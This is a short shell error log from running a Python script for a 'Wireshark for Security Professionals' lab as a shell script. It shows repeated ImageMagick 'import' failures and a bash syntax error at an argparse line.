import-im6.q16: unable to open X server ' @ error/import.c/ImportImageCommand/358. import-im6.q16: unable to open X server ' @ error/import.c/ImportImageCommand/358.
import-im6.q16: unable to open X server ' @ error/import.c/ImportImageCommand/358. import-im6.q16: unable to open X server ' @ error/import.c/ImportImageCommand/358.
import-im6.q16: unable to open X server ' @ error/import.c/ImportImageCommand/358. import-im6.q16: unable to open X server ' @ error/import.c/ImportImageCommand/358.
import-im6.q16: unable to open X server ' @ error/import.c/ImportImageCommand/358. import-im6.q16: unable to open X server ' @ error/import.c/ImportImageCommand/358.
import-im6.q16: unable to open X server ' @ error/import.c/ImportImageCommand/358. import-im6.q16: unable to open X server ' @ error/import.c/ImportImageCommand/358.
from: too many arguments
./w4sp_webapp.py: line 17: syntax error near unexpected token `('
./w4sp_webapp.py: line 17: `parser = argparse.ArgumentParser(description='Wireshark for Security Professionals Lab')'
